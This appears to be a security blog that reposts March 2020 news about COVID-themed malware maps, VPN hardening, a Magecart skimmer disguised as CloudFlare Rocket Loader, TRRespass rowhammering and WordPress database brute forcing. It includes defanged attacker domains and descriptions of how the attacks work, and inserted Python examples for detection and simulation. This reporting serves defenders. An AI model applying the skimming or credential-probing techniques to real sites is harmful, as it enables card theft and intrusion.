
Saturday, March 14, 2020

Fake "coronavirus spread maps" infect computers




March 13, 2020, 12:38 pm  by Absenta Mia




The coronavirus pandemic has hit at least 114 countries so far, infecting more than 128,000 people and costing the lives of 4,700. Malicious actors, however, are exploiting this turmoil by creating fake coronavirus spread maps in order to infect users' computers with malware.

As concern about the coronavirus grows, more and more people are looking for online maps to follow the spread of the virus. However, some of these maps are used by hackers to infect users' systems and steal personal information.

Do not download coronavirus spread maps

Despite the current situation, you should avoid downloading maps that show the spread of the virus to your device. According to research by Reason Security, these maps often contain dangerous malware such as AZORult.

Using AZORult, hackers can steal usernames, passwords, credit card numbers, browser history and social media login credentials. They can also gain access to bank accounts and cryptocurrency wallets, or even obtain full remote access to your infected device.

Reason Labs discovered one such piece of malware, called "Corona Virus Map", which uses the same interface as the Johns Hopkins University tracker, which is legitimate. It is a small Win32 EXE file named Corona-virus-Map.com.exe, with a payload of about 3.26 MB.

At present, the AZORult malware only affects Windows devices. However, researchers believe that hackers could create a version for other operating systems as well.

How to recognise a fake map

Unlike legitimate maps, the infected ones often prompt users to download another application to their device in order to watch the spread of the virus live.

Another way to spot these fake sites is to check the URL or the details, as they differ from the legitimate coronavirus dashboards.

If you have already installed "Corona Virus Map" or any such fake map, you should uninstall it immediately and run a virus scan on your device. If you have downloaded some other map, you should also scan your device just in case.

There are, however, some legitimate maps you can trust to follow the spread of the coronavirus:

• Johns Hopkins's tracker
• Healthmap.org
• US Centers for Disease Control and Prevention
• WHO's official tracker

US Govt Shares Tips on Securing VPNs Used by Remote Workers


By Sergiu Gatlan  March 13, 2020  03:34 PM






The Department of Homeland Security's cybersecurity agency today shared tips on how to properly secure enterprise virtual private networks (VPNs) seeing that a lot of organizations have made working from home the default for their employees in response to the Coronavirus disease (COVID-19) pandemic.

"As organizations elect to implement telework, the Cybersecurity and Infrastructure Security Agency (CISA) encourages organizations to adopt a heightened state of cybersecurity," an alert published today says.
Malicious actors expected to focus attacks on teleworkers

Since more and more employees have switched to using their org's VPNs for teleworking, threat actors will increasingly focus their attacks on VPN security flaws that will be less likely to get patched in time if work schedules will be spread around the clock.

CISA also highlights the fact that malicious actors might also increase their phishing attacks to steal the user credentials of employees working from home, with orgs that haven't yet implemented multi-factor authentication (MFA) for remote access being the most exposed.


US-CERT (@USCERT_gov), 9:12 PM - Mar 13, 2020: "Is your organization teleworking because of #COVID19? Here are some https://go.usa.gov/xdMYJ key recommendations on enterprise VPN security. #CyberVigilance #Cyber Cybersecurity #Infosec"




"Organizations may have a limited number of VPN connections, after which point no other employee can telework," CISA adds.

"With decreased availability, critical business operations may suffer, including IT security personnel’s ability to perform cybersecurity tasks."
Mitigations for boosting enterprise VPN security

Among the mitigation measures recommended for organizations considering telework options for their employees because of the Coronavirus disease (COVID-19) pandemic, CISA lists:


• Keeping VPNs, network infrastructure devices, and devices used for remote work up to date (apply the latest patches and security configs).
• Notifying employees of an expected increase in phishing attempts.
• Ensuring that IT security staff are ready for remote log review, attack detection, and incident response and recovery.
• Implementing MFA on all VPN connections, or requiring employees to use strong passwords, to defend against future attacks.
• Testing VPN infrastructure limitations in preparation for mass usage and taking measures such as rate-limiting to prioritize users that will require higher bandwidths.

As part of its teleworking guidance, CISA also advises organizations to review DHS documentation on how to secure network infrastructure devices, avoid social engineering and phishing attacks, choose and protect passwords and supplement passwords, as well as the National Institute of Standards and Technology (NIST) guide to enterprise telework and BYOD security.

The DHS cybersecurity agency previously warned orgs to patch Pulse Secure VPN servers against ongoing attacks trying to exploit a known remote code execution (RCE) vulnerability tracked as CVE-2019-11510.

One week later, the FBI said in a flash security alert that state-backed hackers have breached the networks of a US financial entity and a US municipal government after exploiting servers left vulnerable to CVE-2019-11510 exploits.


US-CERT (@USCERT_gov), 6:17 PM - Jan 10, 2020: "Unpatched Pulse Secure VPN servers remain an attractive target for malicious actors. @CISAgov released an Alert on continued exploitation of CVE-2019-11510 in Pulse Secure. Update ASAP! https://go.usa.gov/xpSzQ #Cyber #Cybersecurity #InfoSec"




CISA also published information on how to defend against scammers who use the Coronavirus Disease 2019 (COVID-19) health crisis as bait to push their scams over the Internet.

The World Health Organization (WHO) and the U.S. Federal Trade Commission (FTC) issued warnings about ongoing Coronavirus-themed phishing attacks and scam campaigns in February.

Microsoft, Google, LogMeIn, and Cisco have also announced last week that they are offering free licenses for their meeting, collaboration, and remote work tools so that teleworkers can join virtual meetings and chat with colleagues while working remotely.


Friday, March 13, 2020

Rocket Loader skimmer impersonates CloudFlare library in clever scheme



Posted: March 10, 2020 by Jérôme Segura
Last updated: March 11, 2020


Update: The digital certificate issued for https[.]ps has been revoked by GlobalSign.

Fraudsters are known for using social engineering tricks to dupe their victims, often times by impersonating authority figures to instill trust.

In a recent blog post, we noted how criminals behind Magecart skimmers mimicked content delivery networks in order to hide their payload. This time, we are looking at a far more clever scheme.

This latest skimmer is disguised as a JavaScript file that appears to be CloudFlare’s Rocket Loader, a library used to improve page load time. The attackers created an almost authentic replica by registering a specially crafted domain name.

This campaign has been affecting a number of e-commerce sites and shows threat actors will continue to come up with ingenious ways to deceive security analysts and website administrators alike.
Decoy Rocket Loader

On a compromised Magento site, we noticed that attackers had injected a script purporting to be the Rocket Loader library. In fact, we can see two almost identical versions loaded side by side.

If we look at their source code, we find that the two scripts are quite different. One of them is obfuscated, while the other is recognizable as the legitimate CloudFlare Rocket Loader library.

There is a subtle difference in the URI path loading both scripts. The malicious one uses a clever way to turn the domain name http.ps (note the dot '.', the extra 'p' and the double slash '//' that follows it) into something that looks like 'https://'. The threat actors are taking advantage of the fact that, since Google Chrome version 76, the "https" scheme (and the special-case subdomain "www") is no longer shown to users.

To reveal the full URL with its protocol, you can double click inside the address bar. In other browsers such as Firefox or Edge, the default is to show the entire URL. That makes this attack a little more obvious and therefore less effective if you were a site administrator investigating this library.
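A defender-side way to check a script tag for this trick, as an added example (not Malwarebytes' code): it parses the src URL the way the browser does, reports the host that will actually be contacted, and approximates what Chrome 76+ would show. The decoy domain http.ps comes from the post; the paths, the sample URLs and the allowlist of expected CDN hosts are constructed assumptions.

```python
"""Audit a <script src> URL for the scheme-hiding lookalike described above.

Added example, not Malwarebytes' code. The decoy domain http.ps is from the
post; the paths and the expected-host allowlist are constructed assumptions.
"""
from urllib.parse import urlsplit

# Assumed: the only host this site should be loading Rocket Loader from.
EXPECTED_CDN_HOSTS = {"ajax.cloudflare.com"}


def browser_display(url: str) -> str:
    """Approximate the Chrome 76+ address bar as the post describes it: the
    'https' scheme and a leading 'www' subdomain are not shown."""
    shown = url
    if urlsplit(url).scheme == "https":
        shown = shown[len("https://"):]
    if shown.startswith("www."):
        shown = shown[len("www."):]
    return shown


def audit_script_src(src: str) -> dict:
    """Return the host the browser will really contact and whether the URL
    carries a familiar CDN name in its path instead of in its host."""
    parts = urlsplit(src)
    real_host = parts.hostname or ""

    # The tell-tale of the http.ps trick: the path starts with '//' followed by
    # something that reads as a hostname. The browser treats that as a path on
    # http.ps, but a human reading 'http.ps//ajax.cloudflare.com/...' sees
    # 'https://ajax.cloudflare.com/...'.
    embedded_host = ""
    if parts.path.startswith("//"):
        embedded_host = parts.path[2:].split("/", 1)[0]

    return {
        "real_host": real_host,
        "embedded_host": embedded_host,
        "displayed_as": browser_display(src),
        "host_expected": real_host in EXPECTED_CDN_HOSTS,
        # Suspicious when an unexpected host hides a hostname-looking segment in its path.
        "suspicious": real_host not in EXPECTED_CDN_HOSTS and "." in embedded_host,
    }


if __name__ == "__main__":
    # Constructed sample tags: one decoy, one genuine CDN reference.
    for url in (
        "https://http.ps//ajax.cloudflare.com/cdn-cgi/scripts/rocket-loader.min.js",
        "https://ajax.cloudflare.com/cdn-cgi/scripts/rocket-loader.min.js",
    ):
        print(audit_script_src(url))
```

Run against every script tag in a page's HTML and review any entry whose `real_host` is not on the allowlist; the `displayed_as` field shows why the decoy passes a quick glance in Chrome.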
Active skimmer campaign

The Palestinian National Internet Naming Authority (PNINA) is the official domain registry for the .ps country code Top-Level-Domain (ccTLD). The decoy domain http.ps was registered on 2020-02-07 via the Key-Systems GmbH registrar.

In mid-February, security researcher Willem de Groot tweeted about how this domain was being used for credit card skimming in an ongoing campaign with the additional “e4[.]ms” domain.

The skimmer code as well as its exfiltration gate (autocapital[.]pw), were described by Denis Sinegubko, a security researcher at GoDaddy/Sucuri.

There are two ways e-commerce sites are being compromised:
• Skimming code that is injected into a self-hosted JavaScript library (the jQuery library seems to be the most targeted)
• A script that references an external JavaScript file hosted on a malicious site

The first version of the skimmer used in this campaign is the hex obfuscated type with data exfiltration via autocapital[.]pw as seen in the decoy Rocket Loader library. As Denis mentioned in his tweet, this skimmer contains an English and Portuguese version (urlscan.io archive here).

The other version of the skimmer (hosted on e4[.]ms) uses a different obfuscation scheme with data exfiltration via xxx-club[.]pw (this domain is on the same server as the autocapital[.]pw exfiltration gate).

We recognize this obfuscation pattern as ‘Radix’, from a previous campaign described and tracked by Sucuri since 2016. Given the naming convention used for the domains and skimmers, we believe the same threat actors may be behind this newest wave of attacks.
Patching and proactive security

This kind of attack reinforces the importance of good website security. The majority of compromises happen on sites that have not been updated or that use weak login credentials. These days, other forms of defense include web application firewalls and general hardening of the CMS and its server.

The majority of consumers that shop on a compromised site will have no idea that something went wrong until it’s too late. Even though it is the responsibility of the merchant to ensure their platform is secure, it is obvious that additional containment needs to be taken by visitors themselves.

Malwarebytes users are protected against this credit card skimming attack via our web protection layer in Malwarebytes for consumers and businesses.

We have reached out to the registrar and certificate authority but at the time of writing the malicious decoy domain is still active.
Indicators of compromise

Skimmers and gates: http[.]ps, autocapital[.]pw, xxx-club[.]pw, e4[.]ms, y5[.]ms
IP addresses: 83.166.248[.]67, 83.166.244[.]189

Thursday, March 12, 2020

TRRespass research reveals rowhammering is alive and well

by Paul Ducklin


We’re not sure quite how dangerous this problem is likely to be in real life, but it has the most piratical name for a bug that we’ve seen in quite some time, me hearties.

TRRespass is how it’s known (rrrroll those Rs if you can!) – or plain old CVE-2020-10255 to the landlubber types amongst us.

Trespass is the legal name for the offence of going onto or into someone else’s property when you aren’t supposed to.

And TRR is short for Target Row Refresh, a high-level term used to describe a series of hardware protections that the makers of memory chips (RAM) have been using in recent years to protect against rowhammering.

So TRRespass is a series of cybersecurity tricks involving rowhammering to fiddle with data in RAM that you’re not supposed to, despite the presence of low-level protections that are supposed to keep you out.

Rowhammering is a dramatically but aptly named problem whereby RAM storage cells – usually constructed as a grid of minuscule electrical capacitors in a silicon chip – are so tiny these days that they can be influenced by their neighbours or near neighbours.

It’s a bit like writing the address on an envelope in which you’ve sealed a letter – a ghostly impression of the words in the address is impinged onto the paper inside the envelope.

With a bit of care, you might figure out a way to write on the envelope in such a way that you alter the appearance of parts of the letter inside, making it hard to read, or even permanently altering critical parts (obscuring the decimal points in a list of numbers, for example).

The difference with rowhammering, however, is that you don’t need to write onto the envelope to impinge on the letter within – just reading it over and over again is enough.

In a rowhammering attack, then, the idea is to be able to modify RAM that you aren’t supposed to access at all (so you are writing to it, albeit in a somewhat haphazard way), merely by reading from RAM that you are allowed to look at, which means that write-protection alone isn’t enough to prevent the attack.
One row at a time

To simplify the otherwise enormous number of individual control connections that would be needed, you can’t read just one bit at a time from most RAM chips.

Instead, the cells storing the individual bits are arranged in a series of rows that can only be read out one full row at a time.

[Figure: 4×4 grid of memory cells representing a DRAM chip]

To read cell C3 above, for example, you would tell the row-selection chip to apply power along row wire 3, which would discharge the capacitors A3, B3, C3 and D3 down column wires A, B, C and D, allowing their values to be determined. (Bits without any charge will read out as 0; bits that were storing a charge as 1.)

You’ll therefore get the value of four bits, even if you only need to know one of them.

Incidentally, reading out a row essentially wipes its value by discharging it, so immediately after any read, the row is refreshed by saving the extracted data back into it, where it’s ready to be accessed again.

Also, because the charge in any cell leaks away over time anyway, every row needs regularly refreshing whether it is used or not.

The RAM circuitry does this automatically, by default every 64 milliseconds (that’s about 16 times a second, or just under 1,000 times a minute).

That’s why this sort of memory chip is known as DRAM, short for dynamic RAM, because it won’t keep its value without regular external help.

(SRAM, or static RAM, holds its value as long as it’s connected to a power supply; Flash RAM will hold its value indefinitely, even when the power is turned off.)
Exploiting the refresh

One problem with this 64ms refresh cycle is that if a RAM row loses its charge or otherwise gets corrupted between two cycles, the corruption won't be noticed: the "recharge" will kick in and refresh the value using the incorrect bits.

And that’s where rowhammering comes in.

In 64ms you can trigger an enormous number of memory reads along one memory row, and this may generate enough electromagnetic interference to flip some of the stored values in the rows on either side of it.

The general rule is that the more you hammer and the longer the cell has been leaking away its charge, the more likely you are to get a bitflip event.

You can even do what’s called double-sided rowhammering, assuming you can work out what memory addresses in your program are stored in which physical regions of the chip, and hammer away by provoking lots of electrical activity on both sides of your targeted row at the same time.

Think of it as if you were listening to a lecture on your headphones: if attackers could add a heap of audio noise into your left ear, you’d find it hard to hear what the lecturer was saying, and might even misunderstand some words; if they could add interference into both ears at the same time, you’d hear even less, and misunderstand even more.
Reducing the risk

Numerous ways have emerged, in recent years, to reduce the risk of rowhammering, and to make real-world memory-bodging attacks harder to pull off.

Anti-rowhammering techniques include:
• Increasing the DRAM refresh rate. The longer a bit goes unrecharged, the more likely it is to flip due to on-chip interference. But recharging the cells in a DRAM row is done by reading their bit values out redundantly, thus forcing a refresh. The time spent refreshing the entire chip is therefore a period during which regular software can't use it, so that increasing the refresh rate reduces performance.
• Preventing unprivileged software from flushing cached data. If you read the same memory location over and over again, the processor is supposed to remember recently used values in an internal area of super-fast memory called a cache. This naturally reduces the risk of rowhammering, because repeatedly reading the same memory values doesn't actually cause the chip itself to be accessed at all. So, blocking unauthorised programs from executing the clflush CPU instruction prevents them from bypassing the cache and getting direct access to the DRAM chip.
• Reducing the accuracy of some system timers. Rowhammering attacks were invented that would run inside a browser, and could therefore be launched by JavaScript served up directly from a website. But these attacks required very accurate timekeeping, so browser makers deliberately added random inaccuracies to JavaScript timing functions to thwart these tricks. The timers remained accurate enough for games and other popular browser-based apps, but not quite precise enough for rowhammering attackers.
• A Target Row Refresh (TRR) system in the chip itself. TRR is a simple idea: instead of ramping up the refresh rate of memory rows for the entire chip, the hardware tries to identify rows that are being accessed excessively, and quietly performs an early refresh on any nearby rows to reduce the chance of them suffering deliberately contrived bit-flips.

In other words, TRR pretty much does what the name suggests: if a DRAM memory row appears to be the target of a rowhammer attack, intervene automatically to refresh it earlier than usual.

That way, you don’t need to ramp up the DRAM refresh rate for every row, all the time, just in case a rowhammer happens to one row, some of the time.
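A toy simulation of the refresh mechanics and the TRR trade-off described above, added here and not taken from the article or the TRRespass paper: it hammers one row for a single 64ms window on a chip without TRR, on one with a counter-based TRR, and on one where the refresh rate is simply raised eightfold, then counts bit-flips and refresh cost. Row count, activation time, the flip threshold and the TRR counter threshold are assumed values chosen to make the effect visible, not figures from any real chip.

```python
"""Toy model of DRAM auto-refresh and Target Row Refresh (TRR).

Added example: a simulation, not real memory access and not code from the
article or the TRRespass paper. All constants below are assumed values.
"""

ACT_TIME_MS = 0.001      # assumed: one row activation (read) takes 1 microsecond
FLIP_THRESHOLD = 10_000  # assumed: disturbances a row tolerates between two refreshes


class Dram:
    """A strip of DRAM rows; each activation of a row disturbs its neighbours."""

    def __init__(self, rows, refresh_ms=64.0, trr_threshold=None):
        self.rows = rows
        self.refresh_ms = refresh_ms        # period of the chip-wide auto-refresh
        self.trr_threshold = trr_threshold  # activations per window that make TRR react; None = no TRR
        self.stress = [0] * rows            # disturbances on each row since its last refresh
        self.hits = [0] * rows              # activations per row in the current window (TRR counter)
        self.next_refresh = refresh_ms      # time (ms) of the next auto-refresh
        self.refreshes = 0                  # row refreshes performed: the performance cost
        self.flipped = set()                # rows whose cells gave way

    def refresh(self, row):
        """Recharge one row. A refresh saves back whatever the row holds now, so a
        row that already flipped stays flipped (the article's point about corruption
        between two cycles going unnoticed)."""
        self.stress[row] = 0
        self.refreshes += 1

    def _auto_refresh(self):
        for r in range(self.rows):
            self.refresh(r)
        self.hits = [0] * self.rows
        self.next_refresh += self.refresh_ms

    def _neighbours(self, row):
        return [v for v in (row - 1, row + 1) if 0 <= v < self.rows]

    def activate(self, row, now_ms):
        """Read `row` at time now_ms: this disturbs the rows on either side of it."""
        while now_ms >= self.next_refresh:
            self._auto_refresh()
        self.hits[row] += 1
        for victim in self._neighbours(row):
            self.stress[victim] += 1
            if self.stress[victim] >= FLIP_THRESHOLD:
                self.flipped.add(victim)
        # TRR: a row activated suspiciously often gets its neighbours refreshed
        # early, instead of the whole chip being refreshed more frequently.
        if self.trr_threshold is not None and self.hits[row] >= self.trr_threshold:
            for victim in self._neighbours(row):
                self.refresh(victim)
            self.hits[row] = 0


def hammer(dram, row, duration_ms):
    """Activate one row back-to-back for duration_ms; return (flipped rows, refresh cost)."""
    now = 0.0
    for _ in range(round(duration_ms / ACT_TIME_MS)):
        dram.activate(row, now)
        now += ACT_TIME_MS
    return sorted(dram.flipped), dram.refreshes


if __name__ == "__main__":
    for label, chip in (
        ("no TRR, 64 ms refresh", Dram(rows=64)),
        ("TRR (threshold 2000)", Dram(rows=64, trr_threshold=2000)),
        ("no TRR, 8 ms refresh", Dram(rows=64, refresh_ms=8.0)),
    ):
        flips, cost = hammer(chip, 10, 64.0)
        print(f"{label:24s} flipped rows={flips} refreshes={cost}")
```

Both mitigations keep the neighbouring rows intact; the difference is that the TRR chip spends 64 row refreshes where the faster global refresh spends 448, which is the performance argument the article makes for TRR.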

So, the authors of the TRRespass paper set out to measure the effectiveness of the TRR mitigations in 42 different DRAM chips manufactured in the past five years.

They wanted to find out:
• How different vendors actually implement TRR. (There's no standard technique, and most of those used have not been officially documented by the chip vendor.)
• How various TRR implementations might be tricked and bypassed by an attacker.
• How effective rowhammering attacks might be these days, even with TRR in many chips.

We’ll leave you to work through the details of the report, if you wish to do so, though be warned that it’s quite heavy going – there’s a lot of jargon, some of which doesn’t get explained for quite a while, and the content and point-making is rather repetitive (perhaps a side-effect of having eight authors from three different organisations).

Nevertheless, the researchers found that they were able to provoke unauthorised and probably exploitable memory modifications on 13 of the 42 chips they tested, despite the presence of hardware-based TRR protections.

Fortunately, they didn’t find any common form of attack that worked against every vendor’s chip – each vulnerable chip typically needed a different pattern of memory accesses unleashed at a different rate.

Even though you can’t change the memory chips in your servers or laptops every few days, this suggests that any successful attack would require the crooks to get in and carry out a fair bit of “hardware reconnaissance and research” on your network first…

…in which case, they probably don’t need to use rowhammering, because they’ve already got a dangerous foothold in your network already.

It also suggests that, in the event of attacks being seen in the wild, changes to various hardware settings in your own systems (admittedly with a possible drop in performance) might be an effective way to frustrate the crooks.
What to do?

Fortunately, rowhammering doesn’t seem to have become a practical problem in real-life attacks, even though it’s widely known and has been extensively researched.

So there’s no need to stop using your existing laptops, servers and mobile phones until memory manufacturers solve the problem entirely.

But at least part of the issue is down to the race to squeeze more and more performance out of the hardware we've already got, because faster processors mean we can hammer memory rows more rapidly than ever, while higher-capacity RAM modules give us more rows to hammer at any time.

As we said last time we reported on rowhammering:


[Whenever] you add features and performance – whether that’s [ramping up memory and processing power], building GPUs into mobile phone chips, or adding fancy graphics programming libraries into browsers – you run the risk of reducing security at the same time.

If that happens, IT’S OK TO BACK OFF A BIT, deliberately reducing performance to raise security back to acceptable levels.

Sometimes, if we may reduce our advice to just seven words, it’s OK to step off the treadmill.

Diagram of DRAM cells reworked from Wikimedia under CC BY-SA-3.0.


WordPress Database Brute Force and Backdoors

WordPress Database Bruteforce

We regularly talk about brute force attacks on WordPress sites and explain why WordPress credentials should always be unique, complex, and hard to guess.

However, the WordPress login is not the only point of entry that hackers use to break into sites. Since the WordPress CMS stores most of its settings in a database, attackers can get access directly to the database to modify functionality and inject malicious code.
Brute Force Attacks on WordPress Databases

Databases are another potential target for brute force attacks. Hosting providers usually prevent access from external networks to their own database servers to minimize the risks of unwanted connections. That being said, usually hundreds — or even thousands — of websites connect to the same database server, so hackers just need to compromise a single site to start a database brute force attack from an internal IP.

For example, one database brute force script we recently found (base.php) loads multiple sets of database credentials from .txt files, each set consisting of the five wp-config.php connection parameters:
• DB_NAME
• DB_USER
• DB_PASSWORD
• DB_HOST
• table_prefix


The script then tries to use these credentials to connect to the database. If a connection is established, they try to obtain the siteurl option from the WordPress wp_options table, which helps the attacker identify which site the matched credentials belong to.



Interesting note: This script prints "owi6ka" if it can't query the siteurl from the database. This string uses Latin-alphabet homoglyphs to stand in for the Russian word "ошибка" (error).
Feasibility of Database Brute Force Attacks

Of course, this approach to brute forcing database credentials may seem significantly more difficult since the attacker is required to guess five connection parameters instead of just two. It’s worth noting that most reputable hosting providers implement proper configuration and assign randomized database names, which mitigates the risk of this type of attack. However, when hosting providers don’t follow security best practices, the approach may still be worthwhile — as demonstrated below.

For example, if you compromise one site on a shared server, you get the host name of the database that is shared by many other sites. Lots of sites use the default “wp_” table prefix. This leaves us with three more parameters to guess.

If the hosting provider has a known pattern of naming databases and database users, then the patterns can be used to generate credentials to probe. All of these prerequisites significantly reduce the difficulty level of guessing database credentials. And given that the attack can’t be blocked by plugins or HTTP-level firewalls and comes from an internal network, this attack approach can try lots of combinations without much interference.

Of course, this is only possible if the database server firewall is not configured to block excessive failed logins — and setting this up can be tricky, since you can’t block an internal IP address that is shared by hundreds of other client sites that rely on the database every second.
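Since the database firewall cannot simply block the shared internal IP, detection is the practical option. The following added example (not Sucuri's script) scans MySQL error-log lines for "Access denied" events and flags a source host that fails against several distinct database users within a short window, which separates a credential-probing script from a single site with a stale wp-config.php. The log lines are constructed in the MySQL 5.7 error-log format (such lines are only written when the server is configured to log failed connections, e.g. log_error_verbosity=3); hosts, user names and thresholds are assumptions.

```python
"""Detect database credential probing in MySQL error-log lines.

Added example, not Sucuri's script. Log lines are constructed in the MySQL 5.7
error-log format (such 'Access denied' notes are only written when the server is
configured to log failed connections, e.g. log_error_verbosity=3); the hosts,
user names and thresholds are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

DENIED_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[\w+\]\s+Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']+)'"
)

# Constructed sample: 10.0.0.5 is a web node on the same shared host cycling
# through guessed wp_* users; 10.0.0.9 is one site whose wp-config.php holds a
# stale password and so fails repeatedly as the same user.
SAMPLE_LOG = """\
2020-03-11T10:15:01.000000Z 12 [Note] Access denied for user 'wp_shop'@'10.0.0.5' (using password: YES)
2020-03-11T10:15:01.200000Z 13 [Note] Access denied for user 'wp_blog'@'10.0.0.5' (using password: YES)
2020-03-11T10:15:01.400000Z 14 [Note] Access denied for user 'wp_store'@'10.0.0.5' (using password: YES)
2020-03-11T10:15:01.600000Z 15 [Note] Access denied for user 'wp_news'@'10.0.0.5' (using password: YES)
2020-03-11T10:15:02.000000Z 16 [Note] Access denied for user 'wp_shop2'@'10.0.0.5' (using password: YES)
2020-03-11T10:15:30.000000Z 17 [Note] Access denied for user 'wp_blog'@'10.0.0.9' (using password: YES)
2020-03-11T10:20:00.000000Z 18 [Note] Access denied for user 'wp_blog'@'10.0.0.9' (using password: YES)
"""


def parse_denials(text):
    """Return (timestamp, user, host) for every 'Access denied' line."""
    events = []
    for line in text.splitlines():
        m = DENIED_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ")
            events.append((ts, m["user"], m["host"]))
    return events


def detect_db_bruteforce(events, window=timedelta(seconds=60),
                         max_failures=4, min_distinct_users=3):
    """Flag a source host that fails too often against too many distinct
    database users inside one sliding window.

    The host alone is a weak key on shared hosting (hundreds of sites share the
    same internal IP, which is why the post notes it cannot simply be blocked),
    so the rule also demands several distinct user names: that is what a
    credential-guessing script produces and a single misconfigured site does not.
    The output is an alert for review, not a block."""
    recent = defaultdict(deque)   # host -> deque of (timestamp, user)
    alerts, alerted = [], set()
    for ts, user, host in sorted(events):
        q = recent[host]
        q.append((ts, user))
        while ts - q[0][0] > window:
            q.popleft()
        users = {u for _, u in q}
        if (len(q) >= max_failures and len(users) >= min_distinct_users
                and host not in alerted):
            alerts.append({"host": host, "failures": len(q),
                           "users": sorted(users), "last_seen": ts})
            alerted.add(host)
    return alerts


if __name__ == "__main__":
    for alert in detect_db_bruteforce(parse_denials(SAMPLE_LOG)):
        print(alert)
```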
Alternative Use Scenarios

This malicious brute force script can be also used in the following scenarios:

If a server’s accounts are not properly isolated and the attacker is able to obtain access to even a single website, it becomes possible to obtain read access to wp-config.php files from other sites and accounts on the same shared server. Credentials from these files can be used by this script to connect to the databases of neighboring sites and find out their addresses.

Another scenario arises when hackers break into a site and want to maintain access to it. The main way to accomplish this is to plant various backdoor scripts and create rogue admin users. However, both of these solutions can be detected and removed during a site cleanup. On the other hand, if hackers successfully guess or steal the credentials of a legitimate admin user, they can also reuse them indefinitely. That’s why we strongly encourage website owners to change all of their passwords after every site compromise.

While many site owners change CMS passwords, however, very few of them ever change their database passwords. So, if hackers steal the database credentials, they leave no traces on the compromised site but still can access it (usually from other compromised sites on the same shared environment).

This script we discovered could easily help them manage the list of the stolen credentials and verify which of them are still valid.
Conclusion

While database brute force attacks are not seen often in the wild, there is definitely some interest in alternative attack vectors.

Ensuring that hosts properly configure their shared server environments may significantly mitigate risks to client websites. User accounts should be completely isolated so that CMS configuration files cannot be read by neighbors. Hosts should assign hard-to-guess database names and database user names. When installing WordPress, webmasters should also be creative when choosing the table prefix for the WordPress database.

When a CMS website has been compromised, you can bet that hackers aren’t just planting backdoors and malicious code on the site. There’s a less-obvious aspect to a compromise that some users may not consider: attackers will also be on the lookout for password and database credentials found in CMS configuration files, such as wp-config — and it’s virtually impossible to detect if an attacker has gathered these at any stage of the infection.

If a compromise occurs, you should be vigilant in updating passwords across your entire environment — including the database. If you don’t change the database credentials after cleanup, hackers may still have access and be able to modify your site via compromised neighbor accounts on the same host, which is not that uncommon in shared hosting environments.

Site owners can refer to our website security guide on best practices and other ways to mitigate risk. If you believe your WordPress website or database has been hacked, we can help clean up the website infection and secure your environment from future compromise.

Tuesday, March 10, 2020

Battling online coronavirus scams with facts






Posted: February 10, 2020 by David Ruiz
Last updated: March 5, 2020


UPDATE 03/05/2020: Yesterday, our malware intelligence researchers found a clever ploy to hide a credential and payment card skimmer behind a website that purported to show updated coronavirus cases on a global map.

Malwarebytes detected the malware which carried the ominous and maybe-too-obvious name “corona.exe.” Upon further analysis, we learned that this malware was actually just a variant of AzorUlt, a family of spyware that steals information and sometimes downloads additional malware. Though we initially named the threat “Trojan.Corona,” we have now updated the name to “Spyware.AzorUlt.”

Unlike similar coronavirus scams we discovered last month, this threat does not rely on an email campaign.

Original story below.

Panic and confusion about the recent coronavirus outbreak spurred threat actors to launch several malware campaigns across the world, relying on a tried-and-true method to infect people’s machines: fear.

Cybercriminals targeted users in Japan with an Emotet campaign that included malicious Word documents that allegedly contained information about coronavirus prevention. Malware embedded into PDFs, MP4s, and Docx files circulated online, bearing titles that alluded to protection tips. Phishing emails that allegedly came from the US Centers for Disease Control and Prevention (CDC) were spotted, too. Malwarebytes also found a novel scam purporting to direct users to a donation page to help support government and medical research.

All of these threats rely on the same dangerous intersection of misinformation and panic—a classic and grotesque cybercrime tactic. A great defense to these is, quite simply, the truth.

At Malwarebytes, we understand that safeguarding you from cyberthreats goes beyond technological protection. It also means giving you the information you need to make smart, safe decisions. Because of this, we’re presenting verified resources and data about coronavirus that will hopefully steer users away from online threats. If you see a sketchy-looking email mentioning the virus (like the one we found below), don’t open it. Instead, come here. If you want to immediately see what these online scams look like, scroll below.
What is coronavirus?

According to the World Health Organization, the current coronavirus that has infected thousands of people across the world is a single variant of a broader family of viruses, also called “coronavirus.” This particular strain of coronavirus was first identified in the city of Wuhan in central China’s Hubei province. It has the title “2019-nCoV.” Though 2019-nCoV is from the same family of coronaviruses as SARS—which spread to 26 countries between 2002 and 2003—it is not the same virus.

As of February 7, coronavirus has spread to at least 25 countries, including Australia, Vietnam, the United States, the Philippines, Nepal, Sweden, the United Kingdom, India, and more. Mexico has no reported cases—the only country in North America to avoid the virus, it appears. Countries in South America, including Brazil, Colombia, Venezuela, and Chile, have not reported any confirmed cases of the virus, either. While the majority of infections are reported in China, with 31,211 confirmed cases, the highest count of any other country is Singapore, with 30 cases.

Full, daily reports on the virus’ spread can be found at the World Health Organization’s resource page here: Novel Coronavirus (2019-nCoV) situation reports. The situation reports also provide information about every country with confirmed coronavirus cases, and this Al Jazeera article compiles that information up to February 6.

According to a February 6 report in The Wall Street Journal that cites scientists and medical academics in China, the recent coronavirus likely started in bats.

According to the US Center for Disease Control, coronavirus symptoms include fever, cough, and shortness of breath.
How can I protect myself from coronavirus?

Because coronavirus spreads from human-to-human contact, the best protection methods involve good hygiene. According to the WHO, individuals should:
Wash your hands frequently with soap and water or use an alcohol-based hand rub if your hands are not visibly dirty.
Maintain social distancing—maintain at least 1 meter (3 feet) distance between yourself and other people, particularly those who are coughing, sneezing and have a fever.
Avoid touching eyes, nose, and mouth.
If you have fever, cough, and difficulty breathing, seek medical care early. Tell your health care provider if you have travelled in an area in China where 2019-nCoV has been reported, or if you have been in close contact with someone who has travelled from China and has respiratory symptoms.
If you have mild respiratory symptoms and no travel history to or within China, carefully practice basic respiratory and hand hygiene and stay home until you are recovered, if possible.

The WHO also actively dispelled some current myths about coronavirus. For instance, individuals cannot catch the virus from dogs and cats that are their pets, and vaccines against pneumonia do not protect against coronavirus.

For more information on coronavirus myths, please visit the WHO Myth Busters page here, along with the WHO Q&A page.
What else should I know about coronavirus?

Coronavirus is a serious threat, but it is not the world-ending plague that many fear. As of February 7, the virus has resulted in 637 total deaths. A February 6 notice by the Chinese media service CGTN reported more recoveries, at 1,542.

